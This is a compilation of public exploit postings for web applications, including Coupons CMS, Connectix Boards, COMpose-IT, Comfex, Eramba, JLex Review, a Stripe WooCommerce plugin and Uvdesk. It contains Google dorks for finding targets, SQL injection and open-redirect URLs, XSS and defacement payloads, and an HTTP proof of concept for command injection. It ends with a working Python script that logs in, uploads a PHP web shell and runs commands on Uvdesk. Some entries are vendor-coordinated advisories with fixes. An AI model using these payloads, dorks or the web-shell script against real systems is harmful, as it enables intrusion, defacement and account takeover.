<pre><code>====================================================================================================================================<br />| # Title : Coupons CMS v4.00 URL redirection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit) |<br />| # Vendor : https://codecanyon.net/item/coupons-cms-500/11686064?ref=shadyro | <br />| # Dork : Powered by CouponsCMS.com |<br />====================================================================================================================================<br /><br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine <br /><br />[+] use payload : /plugin/click.html?backTo=https://packetstormsecurity.com&coupon=2&reveal_code=1<br /><br />[+] http://127.0.0.1/couponscms.com/demo/plugin/click.html?backTo=https://packetstormsecurity.com&coupon=2&reveal_code=1<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : ConverTo Video Downloader & Converter v1.4.2 - Arbitrary File Download Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) |<br />| # Vendor : https://codecanyon.net/item/converto-video-downloader-converter/13225966 | <br />| # Dork : |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] infected file :download.php <br /><br />[+] line 12 readfile ($file); & line 5 $file = urldecode($_GET['f']);<br /><br /><?php <br />if(isset($_GET['f'])){<br /> <br />$siz = convertToBytes($_GET['sz']);<br />$file = urldecode($_GET['f']);<br />$rand = rand(0,5000);<br />header("Content-Description: File Transfer"); <br />header("Content-Type: application/octet-stream"); <br />header('Content-Length: ' . $siz);<br />header("Content-Disposition: attachment; filename=Facebook_video_$rand.mp4"); <br /> ob_clean(); flush();<br />readfile ($file); <br /><br />}<br /><br />[+] http://localhost/[PATH]/download.php?f= Ev!l<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Connectix Boards v0.5.2 SQL injection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit) |<br />| # Vendor : https://www.connectix-boards.org/ |<br />| # Dork : "Powered by Connectix Boards © 2005" |<br />====================================================================================================================================<br /><br />poc :<br /> <br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use Payload : /forum/index.php?act=tlist&page=&poll=1 <br /><br />[+] http://127.0.0.1/free-tracknet/forum/index.php?act=tlist&noreply=1&page= <=====(inject her)<br /><br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : COMpose-IT CMS v2.0 SQL injection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 68.0(32-bit) |<br />| # Vendor : http://www.composeit.hu/ | <br />| # Dork : |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Payload : http://127.0.0.1/pegazusklubhu/main.php?action=cikk&id=56 <====={ inject here<br /><br />[+] Panel : http://127.0.0.1/pegazusklubhu/admin<br /><br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Comfex CMS v2.0.10 XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit) |<br />| # Vendor : https://Comfex.org/ | <br />| # Dork : Création et développement Comfex.org |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] use payload in search box or post an article : <script>alert(/indoushka/);</script> or <marquee><font color=lime size=32>Hacked by indoushka</font></marquee><br /><br />[+] http://127.0.0.1/forum.groupethikacom/<br /><br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>======================================================================================================================================<br />| # Title : ِCMS-pro v.5.0 Sql injection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) |<br />| # Vendor : https://Wojoscripts.com | <br />| # Dork : Wojoscripts Copyright © 2018 Wojoscripts.com |<br />======================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine .<br /><br />[+] Use Payload : /eventpage.php?id= <br /><br />[+] http://wtodaystexascountrycom/eventpage.php?id=17182974 <=====| iinject here<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code># Trovent Security Advisory 2303-01 #<br />#####################################<br /><br /><br />Authenticated remote code execution in Eramba<br />#############################################<br /><br /><br />Overview<br />########<br /><br />Advisory ID: TRSA-2303-01<br />Advisory version: 1.0<br />Advisory status: Public<br />Advisory URL: https://trovent.io/security-advisory-2303-01<br />Affected product: Eramba<br />Affected version: 3.19.1 (Enterprise and Community edition)<br />Vendor: Eramba Limited, https://www.eramba.org<br />Credits: Trovent Security GmbH, Sergey Makarov<br /><br /><br />Detailed description<br />####################<br /><br />Eramba is a web application for managing Governance, Risk, and Compliance (GRC).<br />Trovent Security GmbH discovered that the Eramba web application allows remote<br />code execution for authenticated users.<br />A possible attacker is able to modify the parameter "path" in the URL<br />"https://hostname/settings/download-test-pdf?path=" to execute arbitrary<br />commands in the context of the user account the application is running in.<br />To see the output of the executed command in the HTTP response, debug mode has<br />to be enabled.<br /><br />Severity: High<br />CVSS Score: 8.8 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)<br />CVE ID: CVE-2023-36255<br />CWE ID: CWE-94<br /><br /><br />Proof of concept<br />################<br /><br />HTTP request:<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />GET /settings/download-test-pdf?path=ip%20a; HTTP/1.1<br />Host: [redacted]<br />Cookie: translation=1; csrfToken=1l2rXXwj1D1hVyVRH%2B1g%2BzIzYTA3OGFiNWRjZWVmODQ1OTU1NWEyODM2MzIwZTZkZTVlNmU1YjY%3D; PHPSESSID=14j6sfroe6t2g1mh71g2a1vjg8<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/111.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: de,en-US;q=0.7,en;q=0.3<br />Accept-Encoding: gzip, deflate<br />Referer: https://[redacted]/settings<br />Upgrade-Insecure-Requests: 1<br />Sec-Fetch-Dest: document<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-User: ?1<br />Te: trailers<br />Connection: close<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />HTTP response:<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />HTTP/1.1 500 Internal Server Error<br />Date: Fri, 31 Mar 2023 12:37:55 GMT<br />Server: Apache/2.4.41 (Ubuntu)<br />Access-Control-Allow-Origin: *<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Cache-Control: no-store, no-cache, must-revalidate<br />Pragma: no-cache<br />Content-Disposition: attachment; filename="test.pdf"<br />X-DEBUGKIT-ID: d383f6d4-6680-4db0-b574-fe789abc1718<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br />Content-Length: 2033469<br /><br /><!DOCTYPE html><br /><html><br /><head><br /> <meta charset="utf-8"/> <meta name="viewport" content="width=device-width, initial-scale=1.0"><br /> <title><br /> Error: The exit status code '127' says something went wrong:<br />stderr: "sh: 1: --dpi: not found<br />"<br />stdout: "1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000<br /> link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00<br /> inet 127.0.0.1/8 scope host lo<br /> valid_lft forever preferred_lft forever<br /> inet6 ::1/128 scope host<br /> valid_lft forever preferred_lft forever<br />2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000<br /> link/ether [redacted] brd ff:ff:ff:ff:ff:ff<br /> inet [redacted] brd [redacted] scope global ens33<br /> valid_lft forever preferred_lft forever<br /> inet6 [redacted] scope link<br /> valid_lft forever preferred_lft forever<br />"<br />command: ip a; --dpi '90' --lowquality --margin-bottom '0' --margin-left '0'<br /> --margin-right '0' --margin-top '0' --orientation 'Landscape'<br /> --javascript-delay '1000' '/tmp/knp_snappy6426d4231040e1.91046751.html'<br />'/tmp/knp_snappy6426d423104587.46971034.pdf'. </title><br /><br />[...]<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br /><br />Solution / Workaround<br />#####################<br /><br />The vendor released a fixed version of Eramba.<br /><br />Fixed in version 3.19.2.<br /><br /><br />History<br />#######<br /><br />2023-03-31: Vulnerability found<br />2023-04-04: Vendor contacted<br />2023-04-17: Vendor confirmed vulnerability<br />2023-04-20: Vendor released fixed version<br />2023-05-25: Trovent verified remediation of the vulnerability<br />2023-06-13: CVE ID requested<br />2023-07-28: CVE ID received<br />2023-08-01: Advisory published<br /></code></pre>
<pre><code># Exploit Title: Joomla JLex Review 6.0.1 - Reflected XSS<br /># Exploit Author: CraCkEr<br /># Date: 01/08/2023<br /># Vendor: JLexArt<br /># Vendor Homepage: https://jlexart.com/<br /># Software Link: https://extensions.joomla.org/extension/jlex-review/<br /># Demo: https://jlexreview.jlexart.com/<br /># Tested on: Windows 10 Pro<br /># Impact: Manipulate the content of the site <br /><br /><br />## Greetings<br /><br />The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka <br />CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /><br /><br />## Description<br /><br />The attacker can send to victim a link containing a malicious URL in an email or instant message<br />can perform a wide variety of actions, such as stealing the victim's session token or login credentials<br /><br /><br />Path: /<br /><br />URL parameter is vulnerable to XSS<br /><br />https://website/?review_id=5&itwed"onmouseover="confirm(1)"style="position:absolute%3bwidth:100%25%3bheight:100%25%3btop:0%3bleft:0%3b"b7yzn=1<br /><br /><br /><br />XSS Payloads:<br /><br />itwed"onmouseover="confirm(1)"style="position:absolute;width:100%;height:100%;top:0;left:0;"b7yzn<br /><br /><br />[-] Done<br /></code></pre>
<pre><code>Affected Plugin: Stripe Payment Plugin for WooCommerce<br /><br />Plugin Slug: payment-gateway-stripe-and-woocommerce-integration<br /><br />Affected Versions: <= 3.7.7<br /><br />CVE ID: CVE-2023-3162<br /><br />CVSS Score: 9.8 (Critical)<br /><br />CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H<br /><br />Researcher/s: Lana Codes <br /><br />Fully Patched Version: 3.7.8<br /><br />The Stripe Payment Plugin for WooCommerce plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 3.7.7. This is due to insufficient verification on the user being supplied during a Stripe checkout through the plugin. This allows unauthenticated attackers to log in as users who have orders, who are typically customers.<br /><br />Technical Analysis<br /><br />The Stripe Payment Plugin for WooCommerce, according to its settings, integrates various Stripe payment methods. By default, the plugin provides inline payments, which means that customers can complete their transactions directly on the WordPress website without being redirected to the Stripe website.<br /><br />However, the plugin also provides an option for checkout redirection. This means that customers can choose to be redirected to the Stripe website to complete their payment process. This allows them to have a familiar and secure payment experience on the Stripe platform. To enable the checkout redirection option, you would need to configure the plugin settings accordingly.<br /><br />Examining the code reveals that Stripe Checkout has an order cancellation link. If the customer cancels the payment, they will be returned to the WordPress website.<br /><br />[VIEW THIS CODE SNIPPET ON THE BLOG] <br /><br />The vulnerable 'eh_spg_stripe_cancel_order' function<br /><br />If the link contains the ‘createaccount’ parameter and its value is ‘true’, the plugin will log the customer in based on the order id, without any authentication. This means that it is possible to create a link that automatically logs into any user account associated with an order.<br /><br />An attacker is limited to what users they can log in as due to the fact that it is only possible to login as a user with an order. Considering the requirement of an order, in most cases an attacker will only be able to log in as a customer-level user. However, it is common for shop managers or administrators to create test orders in order to verify order functionality. In these cases there is a chance that by exploiting the authentication bypass vulnerability, an attacker can gain access to an administrative user account, or another higher-level user account.<br /><br />The normal order process looks like this:<br /><br />woo-stripe-checkout-howto-wordfence <br /><br />The exploit process looks like this:<br /><br />woo-stripe-checkout-exploit-howto-wordfence <br /><br />Disclosure Timeline<br /><br />June 8, 2023 – Discovery of the Authentication Bypass vulnerability in Stripe Payment Plugin for WooCommerce.<br /><br />June 8, 2023 – We initiate contact with the plugin vendor asking that they confirm the inbox for handling the discussion.<br /><br />June 9, 2023 – The vendor confirms the inbox for handling the discussion.<br /><br />June 9, 2023 – We send over the full disclosure details. The vendor acknowledges the report and begins working on a fix.<br /><br />June 13, 2023 – A fully patched version of the plugin, 3.7.8, is released.<br /><br />June 19, 2023 – Wordfence Premium, Care, and Response users receive a firewall rule to provide protection against any exploits that may target this vulnerability. Note that we delayed the firewall rule to prevent completely breaking the plugin’s core functionality as it was not being actively exploited.<br /><br />July 19, 2023 – Wordfence Free users receive the same protection.<br /><br />Conclusion<br /><br />In this blog post, we have detailed an Authentication Bypass vulnerability within the Stripe Payment Plugin for WooCommerce plugin affecting versions 3.7.7 and earlier. This vulnerability allows threat actors to bypass authentication and gain access to the accounts of users who have orders. The vulnerability has been fully addressed in version 3.7.8 of the plugin.<br /><br />We encourage WordPress users to verify that their sites are updated to the latest patched version of Stripe Payment Plugin for WooCommerce.<br /><br />Wordfence Premium, Wordfence Care, and Wordfence Response users received a firewall rule to protect against any exploits targeting this vulnerability on June 19, 2023. Sites still using the free version of Wordfence will receive the same protection on July 19, 2023.<br /><br />If you know someone who uses this plugin on their site, we recommend sharing this advisory with them to ensure their site remains secure, as this vulnerability poses a significant risk.<br /><br />For security researchers looking to disclose vulnerabilities responsibly and obtain a CVE ID, you can submit your findings to Wordfence Intelligence and potentially earn a spot on our leaderboard.<br /><br /></code></pre>
<pre><code># Exploit Title: Uvdesk v1.1.3 - File Upload Remote Code Execution (RCE) (Authenticated)<br /># Date: 28/07/2023<br /># Exploit Author: Daniel Barros (@cupc4k3d) - Hakai Offensive Security <br /># Vendor Homepage: https://www.uvdesk.com<br /># Software Link: https://github.com/uvdesk/community-skeleton<br /># Version: 1.1.3<br /># Example: python3 CVE-2023-39147.py -u "http://$ip:8000/" -c "whoami"<br /># CVE : CVE-2023-39147<br /># Tested on: Ubuntu 20.04.6<br /><br /><br />import requests<br />import argparse<br /><br />def get_args():<br /> parser = argparse.ArgumentParser()<br /> parser.add_argument('-u', '--url', required=True, action='store', help='Target url')<br /> parser.add_argument('-c', '--command', required=True, action='store', help='Command to execute')<br /> my_args = parser.parse_args()<br /> return my_args<br /><br />def main():<br /> args = get_args()<br /> base_url = args.url<br /><br /> command = args.command<br /> uploaded_file = "shell.php"<br /> url_cmd = base_url + "//assets/knowledgebase/shell.php?cmd=" + command<br /><br /># Edit your credentials here<br /> login_data = {<br /> "_username": "admin@adm.com",<br /> "_password": "passwd",<br /> "_remember_me": "off"<br /> }<br /><br /> files = {<br /> "name": (None, "pwn"),<br /> "description": (None, "xxt"),<br /> "visibility": (None, "public"),<br /> "solutionImage": (uploaded_file, "<?php system($_GET['cmd']); ?>", "image/jpg")<br /> }<br /><br /> s = requests.session()<br /> # Login<br /> s.post(base_url + "/en/member/login", data=login_data)<br /> # Upload<br /> upload_response = s.post(base_url + "/en/member/knowledgebase/folders/new", files=files)<br /> # Execute command<br /> cmd = s.get(url_cmd)<br /> print(cmd.text)<br /><br />if __name__ == "__main__":<br /> main()<br /> <br /></code></pre>